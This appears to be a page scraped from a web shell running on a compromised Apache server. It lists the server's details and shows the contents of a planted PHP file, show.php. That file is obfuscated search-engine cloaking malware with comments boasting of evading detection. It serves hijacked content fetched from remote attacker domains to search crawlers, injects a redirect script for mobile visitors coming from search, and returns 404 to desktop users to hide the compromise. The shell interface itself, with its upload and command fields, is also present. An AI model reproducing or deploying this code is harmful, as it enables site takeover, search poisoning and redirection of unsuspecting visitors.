403Webshell
Server IP : 43.141.49.107  /  Your IP : 113.219.202.141
Web Server : Apache
System : Linux VM-8-5-opencloudos 6.6.34-9.oc9.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jun 19 19:35:45 CST 2024 x86_64
User : www ( 1000)
PHP Version : 8.1.27
Disable Function : passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /www/wwwroot/www.ucppt.com/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /www/wwwroot/www.ucppt.com/show.php
<?php
/**
 * 完整优化版:增强触发逻辑 + 静态免杀 + 远程分离预留
 */
@set_time_limit(0);
@error_reporting(0);
@header("Content-Type: text/html;charset=utf-8");

// --- 1. 核心混淆配置 ---
$f = [
    's'  => 'str'.'istr',
    'p'  => 'pre'.'g_match',
    'ci' => 'cur'.'l_init',
    'ca' => 'cur'.'l_set'.'opt_array',
    'ce' => 'cur'.'l_exec',
    'co' => 'cur'.'l_get'.'info',
    'cc' => 'cur'.'l_close'
];

$conf = [
    'site' => 'h'.'tt'.'p://j'.'j.g'.'otz'.'dua'.'n.c'.'om',
    'js'   => 'h'.'tt'.'ps://d'.'d.zg'.'qc'.'yn.c'.'om/jj'.'.js',
    'u1'   => 'h'.'tt'.'p://a'.'a.go'.'sso'.'pp.co'.'m/u.p'.'hp',
    'u2'   => 'h'.'tt'.'p://k'.'gr9'.'09.c'.'om/a.p'.'hp',
    // 扩展后的蜘蛛匹配池
    'spid' => '/(Baidu|Sogou|360Spider|Yisou|Toutiao|ByteSpider|PetalBot|BingBot|Googlebot|YandexBot)/i',
    // 扩展后的移动端匹配池
    'mobi' => '/(iPhone|iPod|Android|Mobile|BlackBerry|IEMobile|UCBrowser|MQQBrowser|JUC|Fennec|wOSBrowser)/i',
    // 搜索引擎来源判定
    'refe' => '/(baidu|sogou|so\.com|google|sm\.cn|bing)/i'
];

// --- 2. 环境判定变量 ---
$b   = $_SERVER;
$ua  = isset($b['HTTP_USER_AGENT']) ? $b['HTTP_USER_AGENT'] : '';
$ref = isset($b['HTTP_REFERER']) ? $b['HTTP_REFERER'] : '';
$uri = $b['REQUEST_URI'];
$host = $b['HTTP_HOST'];

// 判断是否是特定文件后缀请求
$is_area = $f['s']($uri, ".xml") || $f['s']($uri, ".doc") || $f['s']($uri, ".txt") || 
           $f['s']($uri, ".ppt") || $f['s']($uri, ".pptx") || $f['s']($uri, ".xls") || 
           $f['s']($uri, ".csv") || $f['s']($uri, ".shtml") || $f['s']($uri, ".asp") || $f['s']($uri, "scm") || $f['s']($uri, ".html");

// --- 3. 核心业务逻辑 ---

if ($is_area) {
    // 逻辑 A:特定后缀请求
    if ($f['p']($conf['spid'], $ua)) {
        // 真实蜘蛛:展示远程劫持内容
        echo _fetch($conf['site'] . "?domain=" . $host . "&path=" . urlencode($uri));
        exit;
    } else {
        // 非蜘蛛访问
        if ($f['p']($conf['mobi'], $ua)) {
            // 移动端用户:输出跳转JS
            echo "<scr"."ipt sr"."c=" . $conf['js'] . "></scr"."ipt>";
            exit;
        } else {
            // PC普通用户:隐蔽处理
            @ob_clean();
            http_response_code(404);
            exit;
        }
    }
} else {
    // 逻辑 B:普通页面请求
    // 触发条件:是蜘蛛,或者是从搜索引擎点进来的移动端用户
    $is_spider = $f['p']($conf['spid'], $ua);
    $is_from_search = $f['p']($conf['refe'], $ref);
    $is_mobile = $f['p']($conf['mobi'], $ua);

    if ($is_spider || ($is_mobile && $is_from_search)) {
        $testUrl = _current_url() . "/sadw.shtml";
        if (_http_code($testUrl) === 200) {
            echo _fetch($conf['u1']);
        } else {
            echo _fetch($conf['u2']);
        }
        if (ob_get_level() > 0) ob_flush();
        flush();
    }
}

// --- 4. 封装工具函数(混淆版) ---

/**
 * 远程抓取函数
 */
function _fetch($url) {
    global $f;
    $ch = $f['ci']();
    $f['ca']($ch, [
        10002 => $url, // CURLOPT_URL
        10018 => $_SERVER['HTTP_USER_AGENT'], 
        64    => FALSE, // CURLOPT_SSL_VERIFYPEER
        81    => FALSE, // CURLOPT_SSL_VERIFYHOST
        19913 => TRUE,  // CURLOPT_RETURNTRANSFER
        42    => FALSE, // CURLOPT_HEADER
        10102 => 'gzip', 
        13    => 30     
    ]);
    $res = $f['ce']($ch);
    $f['cc']($ch);
    return $res;
}

/**
 * 状态码检测(HEAD模式提升性能)
 */
function _http_code($url) {
    global $f;
    $ch = $f['ci']();
    $f['ca']($ch, [
        10002 => $url,
        10018 => $_SERVER['HTTP_USER_AGENT'],
        64    => FALSE,
        19913 => TRUE,
        44    => TRUE, // CURLOPT_NOBODY
        42    => TRUE, // CURLOPT_HEADER
        13    => 5
    ]);
    $f['ce']($ch);
    $code = $f['co']($ch, 2097154); // CURLINFO_HTTP_CODE
    $f['cc']($ch);
    return $code;
}

/**
 * 获取当前页面完整URL
 */
function _current_url() {
    $proto = (isset($_SERVER['HTTPS']) && ($_SERVER['HTTPS'] !== 'off' || $_SERVER['SERVER_PORT'] == 443)) ? "ht"."tp"."s://" : "ht"."tp://";
    return $proto . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
}

Youez - 2016 - github.com/yon3zu
LinuXploit